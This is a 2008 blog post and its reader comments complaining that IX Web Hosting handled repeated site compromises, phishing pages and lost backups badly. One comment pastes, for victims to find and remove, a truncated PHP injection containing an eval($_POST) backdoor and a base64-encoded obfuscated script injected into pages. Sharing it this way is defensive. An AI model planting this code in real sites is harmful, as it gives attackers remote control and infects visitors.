IX Web Hosting - Terrible Customer Service? - Part 2
If you haven’t read part 1 of this post, use the link below.
IX Web Hosting - Worst Host Ever? - Part 1
After my first run in with IX Web Hosting, I wrote the whole incident off as a fluke. The manager I spoke to seemed very sincere and assured me that wasn’t proper protocol and wouldn’t happen again. I was trucking right along until I got this email from them on October 26, 2008.
|
Dear Brent Crouch,
We have received notification of phishing material in your account. Phishing files are usually placed through some type of exploit of out dated code, weak file and folder permissions. Packaged shopping carts and photo galleries are usual sources as hackers find exploits and developers fix them almost daily, so unless you constantly update the software or completely secure it things like this can happen. You must agree to remove this content and update any software that has resulted in security holes. To protect your account from further action you must agree to our request for compliance. Please respond to this message stating your intent to do so. You may either log into your control panel with us, and access this ticket via the 24/7 help desk, or provide this ticket number to our Live Chat or phone representatives. Failure to respond to this message within 72 hours will result in the suspension of the affected domain with us until such a time as this matter is resolved. Michael |
The email gave me no indication of which domain had been hacked. When I wrote to live help and gave them the ticket number, I spent 10 minutes waiting only to be told they didn’t know which of my domains had been effected. They recommended I reply to the online support ticket. Here is the email I sent them in response on October 27, 2008.
|
I replied to live help and they could not find any information. So far you haven’t told me which domain is a problem.
Please give me the info I need to correct this problem and I’ll take care of it. Brent Crouch |
Eight hours later, I was able to find the problem by viewing all the files on my domains and looking for the files that had been recently changed. It turned out my brentcrouch.com domain had been hacked and setup with all sorts of eBay and bank phising pages. The site operates on a Wordpress platform which is widely used and is a big target for hackers. Aaron Wall provides some good info on how to secure your Wordpress installation from being hacked.
I wrote back to IX Web Hosting for a second time on October 27, 2008.
|
I found the problem on my brentcrouch.com domain. I updated the wordpress software to the latest and cleaned up the problem.
The only exception is the brentcrouch.com/forum directory. I am unable to delete this directory as the hacker has removed my access. Please delete the directory. Thanks, Brent Crouch |
The following day, here is the email I got back from IX Web Hosting.
| Brent:
Thank you for your attention to this matter. Per your request we have removed: /brentcrouch.com/forum - deleted We will be closing this ticket at this time. If you have any questions please feel free to contact us. We will be happy to assist. Please note that this is the second time this problem occurred. Unfortunately, I have to bring to your attention that as per our terms of service a third instance will result in immediate account termination without notice. No backups will be provided. If you have any questions about how to avoid this from happening again our support team will be glad to advise. Respectfully |
When I seen that response, I was pissed! I run my own server at Servint.net. I’ve hosting accounts at several other hosting companies. I’ve never had a site hacked except from IX Web Hosting.
In 4 months, I’ve had two sites hacked. In both instances, IX Hosting was zero help in locating the source of the problem. In the first incident, they didn’t even reply to my ticket for 4 days. In the latest incident, they couldn’t even tell me what domain was hacked.
Then they send me an email telling me if it happens again not only will they suspend my account, they’ll deny me access to my files! Huh?
That’s not a risk I’m willing to take. With the high costs of obtaining customer’s in this business, I’m a little surprised they don’t do a better job of trying to retain them. In my opinion, this policy is unacceptable and makes IX Web Hosting one of the worst hosts I’ve ever dealt with.
I just signed up for a hosting account with Host Gator and have already moved all my domains over. So far, so good.
What’s your experience with IX Web Hosting?
If you enjoyed this post, make sure you subscribe to my RSS feed!
Tags: bad web hosting, ix web hosting, web hosting, worst web host
Found this site because of a problem I am having with IXweb.
I have 4 Buisness Accounts (about 35 sites)
In May, I had the exact same problem, a “Wells Fargo” Phising site was added to my site folder, .. I asked how it was added, and of course it was my fault, permissions, ftp virus.. bla bla bla..
During July, Aug, and September, 2 of my buisness accounts, ( 18 sites) along with 1000’s of others (ALL IXweb) were mass injected, base64 code injected into EVERY file, and permissions set to “server” (httpd) this happened EVERY 10 days for 3 months!!.. 1000’s of sites were affected.
5 weeks went by, and today, ALL my sites were again injected, this time with a .htaccess file redirecting the sites to porn sites.
The support at IXweb is USELESS, they know only what they have written in front of them, and even that, they get wrong!!..
I now have a daunting task of moving about 35 sites to another host.
Anyone serious about their web site, shoud not touch IXweb with a barge pole.
@ Paul - I also had the same Wells Fargo site added to my server. I’m beginning to wonder about the security that IX Web Hosting has in place. They aren’t running a standard WHM / cpanel. The vulnerability could be with their system.
I usually take care of my own sites, but when things get ugly I’ve got a guy that I use. If you need some help, just email me at brent at brentcrouch.com and I’ll get you contact info.
Also be aware of this new cloaking / hacking method posted by Aaron Wall.
http://www.seobook.com/wordpress-blog-hacking-checklist
Good Luck,
Brent
I have personally spoken to the Manager of IX web, and they have openly addmitted ( in writing as well) that the issue WAS on their end, the July thru Sept. fiasco turned out to be a “Php Module” in the Linux server that allowed the worm to inject.
The latest .htaccess injection is being looked into, and has nothing to do with the July / Sept. attack.
The problem with IX is the support, they are ( or at least the majority) completely USELESS, and every problem that occurs, is the fault of the customer..
I had 100% static html sites with ZERO subfolders injected, and they still blamed me for permission problems (777) when I told them I did not have any folders, they turn to ” Ftp Virus” !!!..
Only after months of phone calls, and threats, do they finally admit the problem is on their end.
For anyone interested, here is a link to a topic that was about the attack
forum.joomla.org/viewtopic.php?f=431&t=311270&st=0&sk=t&sd=a&hilit=IXweb
Great information Paul. I appreciate you sharing.
I’d really like to bring this to more people’s attention. If you get a chance maybe you can stop by the forum below and leave your comments. It gets a lot of traffic and views and most everyone there wanted to blame me for my site getting hacked.
http://www.webhostingtalk.com/showthread.php?t=734383
I’m fighting with them right now. I also have a commercial account.
I’ve hosted with IX for years. Usually their tech support is great, but since the data center move, I’d swear their techs were all the former sales people. They declare their servers have never been hacked. I’m struggling right now because all 24 of my domains were compromised. Some have no DNS entry, and had just the IX parking page for the domain — yup, those were hacked too! I had an 11-character complex password, and I only managed my domains using a boot-from-CD VM with no hard drive on the physical box, so there’s no possibility of having malware or viruses when working on domains or when I’m banking. The accounts were hacked and the files all said they were created by root:root, when it should have been me:me. If I had root, I’d be a happy gent.
So, in my opinion, stay away from IX. They used to be great, but I’m switching to a colo-server so I can take care of my domains and my machines. I also have had the “implied threat” of losing all of my content.
Nicel commentary, and good to virtually meet you, Brent.
I had a number of IX Web Hosting accounts compromised on 13 November. The are claiming it is not them: the fact that multiple customers are having problems must just be one big coincidence.
Blog entry discussing attack at:
http://blog.riskythinking.com/2008/11/my-website-got-hacked.html
I put a post on WebHostingTalk, answering your (rhetorical) question.
I did ask them to restore my entire home directory with all files. They keep asking inane questions, such as which folder is my home folder (duh!). I’m waiting for their “oops, no backups” message. Complete TOS fail, in my opinion.
Getting the email structures set up on the new VPS, and then I’ll be switching. Good thing I have 2 weeks left on this month’s subscription. I’m just waiting to see if they pull an AOL and keep billing my credit card after I leave.
I tried to use servage.net hosting - it is worst hosting company ever.
Hi M8, could you give me more info about Servint.net and using VPS or dedi servers.
I know nothing about them, and would like to run about 30 sites.. is that possible ?
Any info / experience is appreciated.
Regards
Paul
@Everyone - I had some problems when I moved my site from IX Webhosting to Host Gator. Even though my core Wordpress files were moved to the new server, my config file was still pointing to the Mysql database I had at IX Webhosting.
I didn’t even realize this happened until yesterday when IX closed my account. When that happened, the database no longer existed and my blog went down.
I just realized what happened and restored the database with my latest backup. Unfortunately, that backup was missing a few of your comments. I believe I have restored most of them from the email moderation emails Wordpress sends out when a comment is left.
I apologize for the inconvenience.
@Paul -
Hi Paul,
Servint.net offers a VPS for for only $49 a month. With a VPS, you can setup all your clients an individual account with their own cpanel. You as the administrator will be able to access and manage all the accounts from one cpanel known as WHM.
You’ll be able to add as many accounts to your VPS as space allows. I think you’ll be very pleased with their service. You should at least give them a call.
I’ve always had shared hosting accounts like IX and was a little intimidated at setting up my own VPS. I was basically forced to when I had a site getting over 100,000 visitors a month. It turned out to be very easy to do and the guys at Servint.net were their to help with any questions I had.
If you decide to go this route, I’d be happy to give you a hand at no charge. It’s been over a year since I set my last VPS up and I’d like to have the practice of doing it again. If I can be of help to you, just let me know and we can setup a plan to configure the VPS and migrate your accounts.
I have a VPS at Inmotion. Any details I should keep an eye out for when working on my system? Still trying to back up my IX account. I now have access issues via http://FTP. By the by, every single restored folder was hit at exactly 06:53 with the injector plus the bogus htaccess plus the fake php pages — three server root hacks still running strong. I created a new folder, put in a fake HTML page, and at 10:35 it was hit with all three. You’d think they would have their servers de-rooted by now. I’m wondering if it isn’t an inside job.
@Guy - I don’t believe it was an inside job. I just believe IX still doesn’t know what the problem is. My opinion is the story about the outdated php files is bogus. If that were the case, all the servers should be updated by now and the attacks should be over.
I can’t think of anything to watch out for on your VPS. If you run into any trouble drop me an email and I’ll try to help.
Thank you Brent for the very kind offer, I might take you up on it one day, but at the moment I am slowly moving my sites away from IX to another host.. hopefully things will be a hell of a lot better than IX, one thing is certain, it can never be worse..
Today I filed a complaint with the BBB ( Better Business Bureaus )
I stronly advise everyone suffering from the IX web hosting incompetence, lies and deceit to file an official complaint, and try and get some kind of compensation for your grief.
You can file a complaint at
https://odr.bbb.org/odrweb/public/GetStarted.aspx
Let’s hope IX webhosting can finally get there act together, and start respecting their honest customers.
And another happy IX web customer shares her ordeal
http://ixwebhostwarning.wordpress.com/
Same deal here. I’ve had phishing files placed on my hosting, my phpbb3 board injected with malicious java code, and all of my files set to read only as well as having code injected into the end of EVERY SINGLE html and php file.
Each and every time their worthless Ukraiane based help desk pointed the finger squarely at me, insisiting I had a password stealing trojan on my machine. That is what the paper they read off of tells them to do.
They were totally unwilling to accept any responsibilites for the hacks. They suck, plain and simple.
We have had the same experience with IXwebhosting - several of our sites have been introduced hacker code. On 20.12.2008, there was added encoding deployed on all sides.
IXwebhostings support department believes that it is open script is guilty of hacking and 777 permisions, which we can refuse. They’ve created a user who comes from the root or other administrative use as places of encoding files, etc. Watch your file is not addressed then check all files for this code.
Dear René,
We are extremely sorry for the trouble you have faced.
Please, note that most of hackers’ attacks are usually done through vulnerabilities of website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such kind of software. From our side, all server-side software (web services, FTP services, etc..) we are keeping up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.
The attack that happened to your sites could be made via an FTP access to your account. Unfortunately, we don’t suggest secure FTP connection, for the reason of shared hosting. Please, could you change the FTP passwords under FTP MANAGER icon -> opposite to password field click on Edit. Please, take all of the appropriate measures to prevent other people access your FTP account and use your FTP login information.
Please note that your files are located on the Linux-based server and you are able to change file/folder permissions so make sure you do not have any “open” files/folders with write permissions set for all.
So please check if any folders has full granted permissions 777 set, which is means that it’s worldwriteable for anyone from the Web. Recommended permissions are 755 or 644.
Should you have any further questions, feel free to contact us at anytime, we are available 24/7.
With regards, Lesya Geychenko.
Ecommerce corp. CR Dept.
Our company work every day with Linux servers - and all permissions are correct.
If your site has been hacked - Remove this php-coding in your files.:
<?php if(!function_exists(’tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f=’/tmp/m’.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined(’TMP_XHGFJOKL’))define(’TMP_XHGFJOKL’,base64_decode(’PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCchLyUyRiYlM0N+ZH5pdiYlMjAkJTczJCU3NH4lNzklNkNlPWRgJTY5QHMmJTcwJCU2QyU2MSQlNzklM0ElNkUlNkYlNkUlNjUlM0VcbiZkb2N1JTZEJmUkJTZFfHQuI3dyIyU2OXRlKCElMjIlM0MvJTc0JTY1JTc4fHRhfnImZWElM0UhIiUyOUAlM0IjJTc2YSU3MiMlMjAlNjklMkNAJTVGISxhJTNEfCU1Qn4iJCUzNyQlMzglMkUhJTMxMSQlMzBgLiUzMWA3fDUmLjIxfCIjJTJDJTIyJjE5JTM1LiUzMiUzNHwuQCUzNyE2JiUyRWAlMzImNSUzMX4iXSUzQl8lM0QlMzElM0JpJCU2NiUyOH4lNjRvJCU2MyU3NSYlNkQlNjVudCMlMkVAYyU2Rn5vayU2OX4lNjUubSU2MSElNzQlNjNoKEAvJCU1Q2BiJmgmJTY3QCU2NiU3NCYlM0R8MX4vISkhPT0lNkUkJTc1fCU2QyZsKWYmJTZGQHImKCU2OXwlM0QwO2lgJTNDJTMyITtpKyYlMkIlMjlkJTZGY351JTZEfiU2NX4lNkV0IS4jd2AlNzIlNjkjJTc0JmUlMjglMjIlM0NgJTczYyNyfGklNzAlNzQlM0VpfiU2NihffilkJTZGY3VtYGUjJTZFfnQlMkV3JCU3MiFpdH4lNjUofiU1QyMlMjIlM0MlNzMlNjMhciU2OSU3MHQlMjAmaWRgPSQlNUYlMjJAJTJCaSMlMkIlMjJAJTVGfCUyMCU3M2AlNzJjPUAvLyIrI2EhWyQlNjkhXSQlMkJAInwlMkZjJTcwYCUyRiQlM0ZAJTIyIyUyQnwlNkVhfCU3NiU2OWAlNjd8YSU3NCU2RmAlNzIlMkUlNjElNzAjcCU0RWElNkR8ZXwlMkVjJTY4JCU2MSU3MiU0MSU3NH4oJTMwJTI5JitAJTIyJTNFJTNDJTVDJTVDJTJGfnN8Y3ImJTY5JTcwdGAlM0VgJTVDfCJ8JTI5JTNDJTVDYC9+JTczJTYzYCU3MkAlNjklNzBgdCUzRSIlMjkkJTNCJFxuJTJGJi8jJTNDJi9AJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cJHwjfFwhfH58XCZ8QHxcfHxgL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo=’));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));if(preg_match_all(’#5){$e=preg_match(’#[\'\"][^\s\'\"\.,;\?!\[\]:/\(\)]{30,}#’,$v)||preg_match(’#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(base64_decode(’IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==’),”,$s);if(stristr($s,’</body’))$s=preg_replace(’#(\s*</body)#mi’,str_replace(’\$’,’\\\$’,TMP_XHGFJOKL).’\1′,$s1);elseif(($s1!=$s)||defined(’PMT_knghjg’)||stristr($s,’=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(’tmp_lkojfghx’);for($i=0;$i
Best regards
René Madsen
Søgemaskineoptimering og seo
Hi Rene,
Thanks for dropping by and leaving your comment. It’s too bad IX is still not being truthful about what is going on.
I’d highly recommend using Servint.net It is one of the best hosting companies I’ve ever dealt with.
I just had my second total website outage with IX in the last 3 months. The first time back in October was the index page Trojan that THEY had on their server and the embedded scripts on all my pages. I restored my own site with backups because of the same rhetoric from them that they no longer had the backups. On Dec. 24th, apparently someone other than me accessed my FTP account (the one with a 25 character random generated HARD password) and my entire site including my OSCommerce store and SQL database was deleted. And again, here’s the response from the Ukrane:
Alex G., Wed Dec 31 04:38:09 2008
Ticket Status was changed from On-Hold to Resolved (NOT REALLY)
Dear Larry Sypher,
I am very sorry for this recent inconvenience, please accept my sincere apologies. Our admins have verified that all relevant backups have been rotated already. Unfortunately all backups which are older than a week are being deleted from the server on a regular basis because we cannot afford to store too old backups due to the many system restrictions of the shared hosting environment. It is much recommended to create local backup copies. I regret.
Best regards,
Technical Agent, CR
CR Department
Ecommerce.com
Alex Golovko
There is one PHP file still on my site that was hidden in Modlogan that directs one to spyhackerz.com. From what I’ve read everywhere, I’m convinced that their server vulnerability is tied to a PHP email reply page, at least in my case. Right before I went down, a got a couple “enquiry addressed” emails from that PHP email address utilized to that email address suggesting I go to some hot porn sites (*with some java code mixed in with the email text). I’m ready to move elsewhere instead of wasting my time rebuilding my whole site there only to loose it a third time again. The problem is that a VPS (Servint.net) is more than I need at this time. Some Happy New Year to me!!! Thanks for letting me vent. Good luck to everyone else too…